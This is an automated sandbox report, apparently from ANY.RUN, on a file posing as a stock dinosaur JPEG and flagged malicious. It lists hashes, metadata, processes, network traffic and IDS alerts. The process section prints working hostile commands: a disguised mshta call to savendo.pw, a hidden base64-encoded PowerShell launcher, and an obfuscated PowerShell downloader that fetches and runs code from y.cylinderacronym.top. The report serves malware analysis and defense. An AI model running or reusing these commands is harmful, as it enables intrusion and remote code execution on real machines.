File name:

istockphoto-1390038554-612x612.jpg

Full analysis: https://app.any.run/tasks/315fd964-2f38-44a7-b23d-1e98d8a5fc09
Verdict: Malicious activity
Analysis date: April 29, 2025, 21:03:15
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: image/jpeg
File info: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=3, description=Tyrannosaurus from the Cretaceous era 3D illustration,\001, xresolution=103, yresolution=111], progressive, precision 8, 612x465, components 3
MD5:

220A2CDC0FD157A22B356161750B9CB2

SHA1:

D52CC03E652037C5E34336FA22BC3E4897BD39F0

SHA256:

07E5214AB3252AE7DDF79152C4958746EFA4BCBF3C15224376D9FE54218AAEB7

SSDEEP:

1536:RA1WBFHM71mAX2djkolrI196muZ7cU6d0O:OWBFHM7AAGdZWjo7cU6P

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 6392)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 728)
  • SUSPICIOUS

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 6876)
    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 6876)
    • Executed via WMI

      • powershell.exe (PID: 6392)
    • Executes script without checking the security policy

      • powershell.exe (PID: 6392)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 6392)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 728)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6392)
  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 6876)
      • powershell.exe (PID: 728)
      • slui.exe (PID: 632)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 6876)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 728)
    • Disables trace logs

      • powershell.exe (PID: 728)
    • Reads the software policy settings

      • slui.exe (PID: 4244)
      • slui.exe (PID: 632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jpg | JFIF-EXIF JPEG Bitmap (38.4)
.jpg | JFIF JPEG bitmap (30.7)
.jpg | JPEG bitmap (23)
.mp3 | MP3 audio (7.6)

EXIF

JFIF

JFIFVersion: 1.01
ResolutionUnit: inches
XResolution: 300
YResolution: 300

EXIF

ImageDescription: Tyrannosaurus from the Cretaceous era 3D illustration
XResolution: 300
YResolution: 300

XMP

Credit: Getty Images/iStockphoto
AssetID: 1390038554
WebStatement: https://www.istockphoto.com/legal/license-agreement?utm_medium=organic&utm_source=google&utm_campaign=iptcurl
DataMining: Prohibited except for search engine indexing
Creator: Warpaintcobra
Description: Tyrannosaurus from the Cretaceous era 3D illustration
LicensorURL: https://www.istockphoto.com/photo/license-gm1390038554-?utm_medium=organic&utm_source=google&utm_campaign=iptcurl

IPTC

By-line: Warpaintcobra
Caption-Abstract: Tyrannosaurus from the Cretaceous era 3D illustration
Credit: Getty Images/iStockphoto

Composite

ImageSize: 612x465
Megapixels: 0.285
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
141
Monitored processes
9
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start mshta.exe svchost.exe powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe powershell.exe conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
632C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
728"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -ex unrestricted -c Set-Variable H0 'http://y.cylinderacronym.top/hpkekeyconfig';SV aEs ([Net.WebClient]::New());SV V83 (((([Net.WebClient]::New()|Member)|Where{(Get-Variable _ -ValueO).Name -clike'*wn*g'}).Name));&(Get-Command *-Ex*n)((GV aEs).Value.((Get-ChildItem Variable:V83).Value)((Item Variable:\H0).Value)) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4120C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
4244"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4696\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5596\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6392powershell.exe -w h -nop -ep un -E JABLAFUAWQBXAD0AJwA2ADkANgA1ADcAOAA1ADcANwAyADYAOQA3ADQANgA1ADIARAA0ADgANgBGADcAMwA3ADQAMgAwADIANwA0ADgANgAxADcAMgA2ADQANgA0ADYAOQA3ADMANgBCADUANgA2AEYANgBDADcANQA2AEQANgA1ADMANwAyADcAMwBCADcAMwA2ADEANwAwADcAMwAyADAAMgAyADIANAA2ADUANgBFADcANgAzAEEANQA3ADQAOQA0AEUANAA0ADQAOQA1ADIANQBDADUAMwA3ADkANwAzADUANwA0AEYANQA3ADMANgAzADQANQBDADUANwA2ADkANgBFADYANAA2AEYANwA3ADcAMwA1ADAANgBGADcANwA2ADUANwAyADUAMwA2ADgANgA1ADYAQwA2AEMANQBDADcANgAzADEAMgBFADMAMAA1AEMANwAwADYARgA3ADcANgA1ADcAMgA3ADMANgA4ADYANQA2AEMANgBDADIARQA2ADUANwA4ADYANQAyADIAMgAwADIARAA0ADEANwAyADYANwA3ADUANgBEADYANQA2AEUANwA0ADQAQwA2ADkANwAzADcANAAyADAAMgA3ADIARAA2ADUANwA4ADIANwAyAEMAMgA3ADcANQA2AEUANwAyADYANQA3ADMANwA0ADcAMgA2ADkANgAzADcANAA2ADUANgA0ADIANwAyAEMAMgA3ADIARAA2ADMAMgA3ADIAQwAyADcANQAzADYANQA3ADQAMgBEADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQAOAAzADAAMgAwADIANwAyADcANgA4ADcANAA3ADQANwAwADMAQQAyAEYAMgBGADcAOQAyAEUANgAzADcAOQA2AEMANgA5ADYARQA2ADQANgA1ADcAMgA2ADEANgAzADcAMgA2AEYANgBFADcAOQA2AEQAMgBFADcANAA2AEYANwAwADIARgA2ADgANwAwADYAQgA2ADUANgBCADYANQA3ADkANgAzADYARgA2AEUANgA2ADYAOQA2ADcAMgA3ADIANwAzAEIANQAzADUANgAyADAANgAxADQANQA3ADMAMgAwADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkAMgA5ADMAQgA1ADMANQA2ADIAMAA1ADYAMwA4ADMAMwAyADAAMgA4ADIAOAAyADgAMgA4ADUAQgA0AEUANgA1ADcANAAyAEUANQA3ADYANQA2ADIANAAzADYAQwA2ADkANgA1ADYARQA3ADQANQBEADMAQQAzAEEANABFADYANQA3ADcAMgA4ADIAOQA3AEMANABEADYANQA2AEQANgAyADYANQA3ADIAMgA5ADcAQwA1ADcANgA4ADYANQA3ADIANgA1ADcAQgAyADgANAA3ADYANQA3ADQAMgBEADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADUARgAyADAAMgBEADUANgA2ADEANgBDADcANQA2ADUANABGADIAOQAyAEUANABFADYAMQA2AEQANgA1ADIAMAAyAEQANgAzADYAQwA2ADkANgBCADYANQAyADcAMgA3ADIAQQA3ADcANgBFADIAQQA2ADcAMgA3ADIANwA3AEQAMgA5ADIARQA0AEUANgAxADYARAA2ADUAMgA5ADIAOQAzAEIAMgA2ADIAOAA0ADcANgA1ADcANAAyAEQANAAzADYARgA2AEQANgBEADYAMQA2AEUANgA0ADIAMAAyAEEAMgBEADQANQA3ADgAMgBBADYARQAyADkAMgA4ADIAOAA0ADcANQA2ADIAMAA2ADEANAA1ADcAMwAyADkAMgBFADUANgA2ADEANgBDADcANQA2ADUAMgBFADIAOAAyADgANAA3ADYANQA3ADQAMgBEADQAMwA2ADgANgA5ADYAQwA2ADQANAA5ADcANAA2ADUANgBEADIAMAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADMAQQA1ADYAMwA4ADMAMwAyADkAMgBFADUANgA2ADEANgBDADcANQA2ADUAMgA5ADIAOAAyADgANAA5ADcANAA2ADUANgBEADIAMAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADMAQQA1AEMANAA4ADMAMAAyADkAMgBFADUANgA2ADEANgBDADcANQA2ADUAMgA5ADIAOQAyADcAMgAwADIARAA1ADcANgA5ADYARQA2ADQANgBGADcANwA1ADMANwA0ADcAOQA2AEMANgA1ADIAMAA0ADgANgA5ADYANAA2ADQANgA1ADYARQAzAEIAMgA0ADcAMgA3ADYANwAwADQAMwA1ADAANgAyADUANwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADUANAA2ADUANgBEADcAMAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANwBBADQAMgA1AEEANwBBADYANgA3ADUAMgA4ADIANAA1ADcANAA4ADQAOAA1ADAANABGADQAMQAyAEMAMgAwADIANAA1ADkANAA1ADYANQA1AEEANAAzADUANQA2ADcAMgA5ADcAQgA2ADMANwA1ADcAMgA2AEMAMgAwADIANAA1ADcANAA4ADQAOAA1ADAANABGADQAMQAyADAAMgBEADYARgAyADAAMgA0ADUAOQA0ADUANgA1ADUAQQA0ADMANQA1ADYANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcAOQA1ADEANABGADYARQA0ADMANgBCADcAMgAyADgAMgA0ADQAQgA1ADUANQA5ADUANwAyADkANwBCADcAQQA0ADIANQBBADcAQQA2ADYANwA1ADIAMAAyADQANABCADUANQA1ADkANQA3ADIAMAAyADQANQA5ADQANQA2ADUANQBBADQAMwA1ADUANgA3ADcARAAzAEIAJwA7ACQAcABSAFkAbABSAEsATQBWAG4APQAoACQASwBVAFkAVwAgAC0AcwBwAGwAaQB0ACAAJwAoAD8APAA9AFwARwAuAC4AKQAnAHwAJQB7AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAF8ALAAxADYAKQApAH0AKQAgAC0AagBvAGkAbgAgACcAJwA7ACAAJgAgACQAcABSAFkAbABSAEsATQBWAG4ALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAHAAUgBZAGwAUgBLAE0AVgBuAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6876"C:\Windows\System32\mshta.exe" https://savendo.pw/mikal.crt ; Human Detected — Firewall Guardian Code: 6274848\\1C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
15 420
Read events
15 403
Write events
17
Delete events
0

Modification events

(PID) Process:(6876) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6876) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6876) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(728) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
6
Text files
20
Unknown types
0

Dropped files

PID
Process
Filename
Type
6876mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\mikal[1].cer
MD5:
SHA256:
6876mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:4A90329071AE30B759D279CCA342B0A6
SHA256:4F544379EDA8E2653F71472AB968AEFD6B5D1F4B3CE28A5EDB14196184ED3B60
6876mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:1FBB37F79B317A9A248E7C4CE4F5BAC5
SHA256:9BF639C595FE335B6F694EE35990BEFD2123F5E07FD1973FF619E3FC88F5F49F
6392powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_koicx3jg.rqv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6392powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f1svtaw4.1oc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6392powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lljwtnh0.dxm.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6392powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:1A30D2FDA8E9187DFDF5DD079322E749
SHA256:303B9439B9485E81337FAC3D8A9B5995E074807C82FEFA45252547FC5F139B86
728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1c3kmcqt.a3b.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6392powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_t2hndrdy.ape.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_snuzk5ay.wdx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
31
DNS requests
19
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2104
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6876
mshta.exe
GET
200
142.250.185.131:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
6876
mshta.exe
GET
200
142.250.185.131:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
728
powershell.exe
GET
301
188.114.96.3:80
http://y.cylinderacronym.top/hpkekeyconfig
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.36:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
23.216.77.36:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.216.77.36:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
6876
mshta.exe
104.21.32.1:443
savendo.pw
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.216.77.36
  • 23.216.77.31
  • 23.216.77.25
  • 23.216.77.32
  • 23.216.77.37
  • 23.216.77.35
  • 23.216.77.30
  • 23.216.77.22
  • 23.216.77.29
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
savendo.pw
  • 104.21.32.1
  • 104.21.48.1
  • 104.21.96.1
  • 104.21.64.1
  • 104.21.112.1
  • 104.21.16.1
  • 104.21.80.1
unknown
c.pki.goog
  • 142.250.185.131
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.5
  • 40.126.32.72
  • 20.190.160.67
  • 20.190.160.2
  • 20.190.160.22
  • 20.190.160.65
  • 40.126.32.133
  • 20.190.160.130
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
y.cylinderacronym.top
  • 188.114.96.3
  • 188.114.97.3
unknown

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.pw domain - Likely Hostile
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
728
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
728
powershell.exe
Potentially Bad Traffic
ET HUNTING Request to .TOP Domain with Minimal Headers
No debug info